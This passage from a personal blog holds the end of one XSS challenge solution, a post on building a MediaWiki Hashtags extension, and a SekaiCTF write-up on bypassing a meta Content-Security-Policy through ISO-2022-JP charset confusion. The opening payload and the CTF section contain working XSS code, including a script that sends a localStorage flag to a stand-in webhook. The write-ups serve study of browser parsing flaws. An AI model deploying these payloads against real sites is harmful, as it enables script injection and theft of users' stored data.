   encodeURIComponent( "<div>Some random Japanese text to trigger the heuristic: \x1b$B%D%t%#%C%+%&$NM5J!$J2HDm$K@8$^$l!\"%i%$%W%D%#%RBg3X$NK!2J$K?J$`$b!\"%T%\"%K%9%H$r$a$6$7$F%U%j!<%I%j%R!&%t%#!<%/$K;U;v$9$k!#$7$+$7!\";X$N8N>c$K$h$j%T%\"%K%9%H$rCGG0!\":n6J2H$H$J$k!#%t%#!<%/$NL<$G%T%\"%K%9%H$N%/%i%i$H$NNx0&$H7k:'$O%7%e!<%^%s$NAO:n3hF0$KB?Bg$J1F6A$r5Z$\$7$?!#\x1b(Bend <style><\x1b(B/style><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><\x1b(B/script><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'><\x1b(B/script><\x1b(Bdiv ng-app ng-csp>{{$on.curry.call().alert($on.curry.call().origin)}}<\x1b(B/div></style>begin\x1b$B%sE*8e\x1b(Bend</div>" ),
"iframe" );

Try it at http://bawolff.net/flatt-xss-challenge.htm

Conclusion

These were some great challenges. The last two especially took me a long time to solve.

Tuesday, October 1, 2024

Hashtags and implementing extensions in MediaWiki by modifying services

 Recently I decided to make a Hashtags extension for MediaWiki.

The idea is - if you add something like #foo to your edit summary, that becomes a link in RecentChanges/history/etc, which you can click on to view other edits so tagged.

I implemented this using MediaWiki's newish services framework. This was the first time I used this as an extension mechanism, so I thought I'd write a blog post on my thoughts.

Why Hashtags

The main idea is that users can self-group their edits if they are participating in some sort of campaign. There are already users doing this, and external tools to gather statistics about it, for example Wikimedia hashtag search, so there seems to be user demand.

MediaWiki also has a feature called "change tags". This allows edits to be tagged in certain ways and searched. Normally this is done automatically by software such as AbuseFilter. It is actually possible for users to tag their own edits, provided that tag is on an approved list. They just have to add a secret url parameter (?wpChangeTags) or edit by following a link with the appropriate url parameter. As you can imagine, this is not easily discoverable.

I've always been excited about the possibility of hashtags. I like the idea that it is a user-determined taxonomy (a so-called folksonomy). You don't have to wait for some powerful gate-keeper to approve your tag. You can just be bold, and organize things in whatever way is useful. You don't have to discover some secret parameter. You can just see that other people write a specific something in their edit summaries and follow suit.

This feels much more in line with the wiki-way. You can be bold. You can learn by copying.

The extension essentially joins both methods together, by automatically adding change tags based on the contents of the edit summary.

Admittedly, the probability of my extension being installed on Wikipedia is probably pretty low. Realistically I am not even trying for that. But one can dream.

For more information about using the extension see https://www.mediawiki.org/wiki/Extension:Hashtags

How the extension works

There are a couple things the extension needs to do:

  • When an edit (or log entry) is saved, look at the edit summary, add appropriate tags based on that edit summary
  • If an edit summary is revision deleted or oversighted, remove the tags
  • Make sure hashtag related change tags are marked as "active" and "hidden".
  • When viewing a list of edits (history, Special:RecentChanges, etc), ensure that hashtags are linked and that clicking on them shows only edits tagged with that tag

 The first three parts work like a traditional extension, using normal hooks.

I used the RevisionFromEditCompleteHook and ManualLogEntryBeforePublishHook to run a callback anytime an edit or log entry is saved. Originally I used RecentChange_saveHook, however that didn't cover some cases where an edit was created but not published to RecentChanges, such as during page moves. ManualLogEntryBeforePublishHook covers more cases than it might appear at first glance, because it will also tag the revision associated with the log entry. All this is pretty straightforward, and allowed tagging most cases. Restricted (confidential) logs still do not get tagged. It seems difficult to do so with the hooks MediaWiki provides, but perhaps it's best not to tag such log entries, lest information be leaked.

Similarly, I used the ArticleRevisionVisibilitySetHook to delete/undelete tags after revdel. Unfortunately MediaWiki does not provide a similar hook for log entries. I proposed adding one, but that is still pending code review.

Marking tags as active was also quite straightforward using normal hooks.

All that leaves is ensuring hashtags are linked. For this I leveraged MediaWiki's newish dependency injection system.

Services and dependency injection

For the last few years, MediaWiki has been in the process of being re-architected, with the goal of making it more modular, easier to test, and easier to understand. A core part of that effort has been the move to a dependency injection system.

If you are familiar with MediaWiki's dependency injection system, you might want to skip past this part.

Traditionally in MediaWiki, if some code needed to call some other code from a different class, it might look like this:

class MyClass { 
    function foo($bar) {
        $someObject = Whatever::singleton();
        $result = $someObject->doSomething( $bar );
        return $result;
    }
}

In this code, when functionality of a different class is needed, you either get it via global state, call some static method or create a new instance. This often results in classes that are coupled together.

In the new system we are supposed to use, the code would look like this:

class MyClass {
    private SomeObject $someObject;
    public function __construct( SomeObject $someObject ) {
         $this->someObject = $someObject;
    }
    public function foo( $bar ) {
         return $this->someObject->doSomething( $bar );
    }
}

The idea being, classes are not supposed to directly reference one another. They can reference the interfaces of objects that are passed to it (typically in the constructor), but they are not concretely referencing anything else in the system. Your class is always given the things it needs; it never gets them for itself. In the old system, the code was always referencing the Whatever class. In the new system, the code references whatever object was passed to the constructor. In a test you can easily replace that with a different object, if you wanted to test what happens when the Whatever class returns something unexpected. Similarly, if you want to reuse the code, but in a slightly different context, you can just change the constructor args for it to reference a different class as long as it implements the required interface.

This can make unit testing a lot easier, as you can isolate just the code you want to test, without worrying about the whole system. It can also make it quite easy to extend code. Imagine you have some front-end class that references a back-end class that deals with storing things in the database. If you suddenly need to use multiple storage backends, you can just substitute the implementation of the backend class, without having to implement anything special.

MediaWikiServices

All this is great, but at some point you actually need to do stuff and create some classes that have concrete implementations.

The way this works in "new" MediaWiki, is the MediaWikiServices class. This is responsible for keeping track of "services" which are essentially the top level classes.

Services are classes that:

  • Have a lifetime of the entire request.
  • Normally only have one instance existing at a time.
  • Do not depend on global state (Config is not considered state, but anything about the request, like what page is being currently viewed is state. Generally these services should not depend on RequestContext)

You can register services, in a service wiring file. This also allows you to register what services your service needs as constructor arguments.

Some classes do not fit these requirement. For example, a class that represents some data we would expect to have multiple instances with shorter lifetimes, to represent the data in question. Generally the approach for such classes is to create a Factory class that is a service, which makes individual instances and passing along dependencies as appropriate.

But still the question remains, how do you get these services initially. There is an escape hatch, where you can call MediaWikiServices::getInstance()->getService( $foo ), however that is strongly discouraged. This essentially uses global state, which defeats the point of dependency injection, where the goal is that your class is passed everything it needs, but never reaches out and gets anything itself.

The preferred solution is that the top level entrypoint classes in your extension are specified in your extension's extension.json file.

Typically extensions work on the levels of hooks. This is where you register a class, which has some methods that are called when certain events in MediaWiki happen. You register these hook handlers in your extension's manifest (extension.json) file.

In old MediaWiki, you would just register the name of some static method. In new MediaWiki, you register a class (HookHandlers), along with details of what services its constructor needs. MediaWiki then instantiates this class for you with appropriate instances of all its dependencies, thus handling all the bootstrapping for you.

To summarize, you tell MediaWiki you need certain services for your hook class. When the hook class is instantiated, it is constructed with the default version of the services you need (Possibly including services you defined yourselves). Those services are in turn instantiated with whatever services they need, and so on.

All this means you can write classes that never reach out to other classes, but instead are always provided with the other classes they need.

What does this have to do with Hashtags?

All this is not generally meant as an extension mechanism. The goal is to make it so classes are isolated from each other for easier testing, modification and understanding.

However, the services bootstrap process does have an idea of default services, which it provides when creating objects that have dependencies. The entire point is to be able to easily replace services with different services that implement the same interface. Sure it is primarily meant as a means of better abstraction and testability, but why not use it for extensibility? In this extension, I used this mechanism to allow extending some core functionality with my own implementation.

One of those services is called CommentParserFactory. This is responsible for parsing edit summaries (Technically, it is responsible for creating the CommentParser objects that do so). This is exactly what we need if we want to change how links are displayed in edit summaries.

In the old system of MediaWiki, we would have no hope in making this extension. In the old days, to format an edit summary, you called Linker::formatComment(). This was a static method of Linker. There would be no hope of modifying it, unless someone explicitly made a hook just for that purpose.

Here we can simply tell MediaWiki to replace the default instance of CommentParserFactory with our own. We do this by implementing the MediaWikiServicesHook. This allows us to dynamically change the default instantiation of services.

There are two ways of doing this. You can either call $services->redefineService() which allows you to create a new version of the Service from scratch. The alternative is to call $services->addServiceManipulator(). This passes you the existing version of the service, which you can change, call methods on, or return an entirely different object.

Hashtags uses the latter method. I essentially implemented it by wrapping the existing CommentParser. I wanted to just replace hashtags with links, but continue to use MediaWiki core for all the other parsing.

Using Services as an extension mechanism

How did this go?

On the bright side, I was able to make this extension, which I otherwise would not have been able to. It indeed works.

Additionally, I feel like simply replacing a class and implementing its interface is a much cleaner abstraction layer for extensibility than executing a callback at random points in the code that can do anything.

There are some frustrations though with using this approach.

First of all, everything is type hinted with the concrete class. This meant I had to extend the concrete class in order for all the type hints to work, even though I didn't really need or want to inherit any methods. Perhaps it would be nice to have some trait that automatically adds all the forwarding magic with __get().

I also intentionally did not call the parent constructor, which I guess is fine because I never call any of the parent's methods, but it does feel a bit odd. The way I implemented my class was to take in the constructor an instance of the "base" class that I forward calls to after wrapping them in my own stuff. Part of the reason for this is that I wanted to use the old CommentParser object, because constructor functions in MediaWiki are highly unstable between versions, so I didn't want to have to manually construct anything from MW core.

The part where this really falls down is if you want to have multiple extensions layering things. This really only works if they both do so in the same way.

At one point in my extension, I wanted to access the list of tags parsed. In retrospect, perhaps this would have been better implemented as a separate service alias that is explicitly for my class. Instead, I implemented it by adding an additional method to return this data and just relied on the normal service name. But I ran into the problem that I can't be sure nobody else redefined this service, so how do I know that the service I got is the one I created with this method? I just tested using instanceof, and if it wasn't mine, tried to wrap the returned service again in my class. This has the benefit that if anyone else modifies the CommentParser service in a layered way, I will hopefully run their code and the list of tags will match the result. On the other hand it's icky, so maybe the better method was the aforementioned separate service alias explicitly for my class. However again, that has the problem of how to bootstrap, since I didn't want to ever have to instantiate the base CommentParser class, with MediaWiki's highly unstable constructors.

This whole part seemed icky, and the various options seemed bad. In practice it maybe doesn't matter, as it's unlikely two extensions will wrap this service, but it seems like there should be a better way. I guess wrapping the service is fine; it's extracting additional information that's the problem.

I think documenting best practices on how to "decorate" services would go a long way here to making this better. Right now it is very unclear how to do this in a way that is composable and extensible.

I've also seen examples of people using reflection when trying to "extend" services, but luckily I didn't need to resort to that.

Testability

The last thing I wanted to mention is that this general system has paid dividends. The path to get here was a little rocky, but I do think this style of code is much clearer.

I used to absolutely hate writing tests for MediaWiki code. It was such a frustrating developer experience. Now it is much less painful. For this extension I have 100% test coverage (excluding maintenance scripts). Admittedly it is a relatively small extension, but five years ago I couldn't imagine bothering to do that for any MediaWiki code.

Conclusion

I had fun writing this extension and am proud of the result. It was interesting to experiment with using MediaWikiServices as an extension mechanism.

Consider trying it out on your wiki, and let me know what you think! The extension should be compatible with MediaWiki 1.39 and higher (using the appropriate REL branch).

More information about it can be found at https://www.mediawiki.org/wiki/Extension:Hashtags



Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem - htmlsandbox. This was quite a challenge: it was the least-solved web problem, with only 4 solves. However, I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near-arbitrary HTML. The only restriction is that the following JavaScript checks must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably, they forgot to include onfocusin in the check, but you don't actually need it for the challenge.
     

This is all evaluated at save time by converting the HTML to a data: url and passing it to a Puppeteer-controlled Chromium instance with JavaScript and external requests disabled. If it passes this validation, the HTML document goes up on the web server.

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal Chrome instance with JavaScript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its localStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other JavaScript checks can easily be bypassed, either by using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template>, which hides the script tag from document.querySelector().

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts on the page (as script-src inherits from default-src).

Normally CSP is specified in an HTTP header. Putting it inside the HTML document does come with some caveats:

  • It must be in the <head>. If it's in the <body> it is ignored.
  • It does not apply to <script> tags (or anything else) that appear in the document before the <meta> tag.

So my initial thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

Turns out, the answer is no. Per the HTML5 spec, if you add content before the head, it acts as if you implicitly closed the <head> tag and started the <body>. No matter how you structure your document, the web browser fixes it up into something reasonable. You cannot put anything other than a comment (and DTDs/PIs) before the <head>.

I also thought about DOM clobbering, but it seemed pretty impossible given that document.querySelector() and === were used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if I redirected the page really quickly, maybe the checks would happen on a page I control.

The problem here is that network requests were disabled in Puppeteer, so I can't just redirect to some site I control. Chrome also disables meta redirection to data: urls (I guess they were a common phishing vector or something), so those are out. And I can't use blob: urls, as I have no JavaScript with which to create a blob url.

Similarly, if instead I try to delay the redirect until after validation has finished, I still have nowhere to redirect to, as I would need a page with an XSS on the same origin in order to read the localStorage. Thus client side redirection was out.

Lots of dead ends here.

The hint

Since no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

It's a big spec, but it seemed like section 13.2 would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

So during the algorithm for determining the character encoding (charset), browsers may determine the encoding from only the first part of the document if all of its bytes are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets. For example, a validator that supports UTF-7, which has a non-ASCII-compatible encoding of <, while web browsers do not support it and interpret a document with an unknown charset as UTF-8.

However this is a bit different, since the validator and the ultimate viewer are the same program - both a web browser, both supporting the exact same charsets.

We need to find two character encodings that interpret the same document in different ways - one with the CSP policy and one without - and both encodings need to be supported by modern web browsers.

What character sets can we even specify? First off, we can discard any encoding that always encodes <, > and " the same way ASCII would, which includes all of the single-byte legacy encodings. Browsers have intentionally removed support for most encodings that are not ASCII-compatible, due to the problems caused by encodings like UTF-7 and HZ. Per the encoding standard, the only candidates left are the legacy multi-byte encodings: Big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUC-KR, UTF-16BE and UTF-16LE.

Looking through their definitions in the encoding standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but with ISO-2022-JP, a series of bytes can affect the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but three encodings that can be switched between with special escape codes. When in ASCII mode, the encoding looks like normal ASCII. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purposes of creating a polyglot document, as we can switch the modes on and off to change the meaning of a wide swath of text.

An Example

Note: throughout this post I will be using ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B.

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

The ^[$BNq sequence switches the charset mode to katakana, and ^[(B switches it back to ASCII. Under windows-1252 these escape sequences are ignored, of course. Thus we have made a polyglot document that will show an alert box only in windows-1252 mode.

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

 Note how the body of the url is exactly the same. The only thing that is different is the charset specified in the mime type of the url, which totally changes the interpretation.

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description - the validator loads the page via a data: url, which loads the full page instantly. The victim loads the page over the network.

In the network case, Chrome will start parsing immediately and guess the charset before the entire document has arrived.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, and add a charset declaration at the end for the other charset, under which the document looks benign. Browsers loading it all at once will see it as benign; browsers loading it over the network will see it as evil. This might look something like:

<html>
	<head>
    	<!-- é - Add a windows-1252 character to make sure early heuristics detect as windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - The browser sees the <meta charset="iso-2022-jp"> tag and processes the whole document in that charset. That means the <script> tag ends up inside an HTML comment interpreted as Japanese text, so it is ignored.
  • Over the network - The browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to try and determine the character encoding. It sees the é in windows-1252 encoding (we could use the same logic for UTF-8, but the challenge transcodes things to windows-1252 as an artifact of naively using the atob() function) and guesses that the encoding of the document is windows-1252. Later on it sees the <meta> tag, but it is too late at that point as part of the document has already been parsed (note: Chrome appears to deviate from the HTML5 spec here. The spec says that if a late <meta> tag is encountered, the document should be thrown out and reparsed, provided that is possible without re-requesting it from the network. Chrome seems to just switch charsets at the point of getting the meta tag and continue parsing). The end result is that the first part of the document is interpreted as windows-1252, allowing the <script> tag to execute.

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out Chrome will wait a certain amount of time before proceeding to parse a partial response. The HTML5 spec suggests waiting for 1024 bytes or 500ms (whichever comes first), but it is unclear what Chrome actually does. Testing this on localhost of course makes the network much more efficient: the MTU of the loopback interface is 64 KB, so each packet is much bigger, and everything also happens much faster, so the timeout is much less likely to be reached.

Thus I did another test where I used a PHP script, with <?php flush();sleep(1); ?> in the middle to force a delay. This worked much better in my testing. Equivalently, I probably could have just tested against the remote version of the challenge.
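
Something along these lines (a sketch, not the exact script; the padding count, delay, and alert payload are arbitrary):

<?php
// Sketch of the local test harness. Serve over HTTP, not as a data: url,
// so Chrome has to guess the charset from a partial body.
header( 'Content-Type: text/html' ); // deliberately no charset in the header

echo '<html><head>';
echo "<!-- \xE9 raw 0xE9 byte: valid windows-1252, invalid UTF-8 -->";
echo "<!-- \x1B\$BNq from here on, only visible in windows-1252 -->";
echo '<script>alert("evil");</script>';
echo str_repeat( "<!-- padding to overflow the preparse buffer -->\n", 3000 );

flush();    // push what we have to the client (may also need ob_flush(),
            // depending on output buffering configuration)
sleep( 1 ); // force Chrome to start parsing before the rest arrives

echo "<!-- \x1B(B back to ASCII in both interpretations -->";
echo '<meta http-equiv="Content-Security-Policy" content="default-src \'none\'">';
echo '<meta charset="iso-2022-jp">';
echo '</head><body></body></html>';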

After several hours of trying to debug, I realized I had actually solved the problem hours earlier :(. In any case, the previous snippet worked when run against the remote.

Conclusion

This was a really fun challenge. It had me reading the HTML5 spec with a fine-toothed comb, as well as running many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

And yet, Chrome had significant deviations from the spec. For example, <meta> tags (after pre-scan) are supposed to be ignored inside <noscript> tags when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore the tag, but according to other contestants Chrome does neither and instead switches charsets midstream.

Thanks to project Sekai for hosting a great CTF.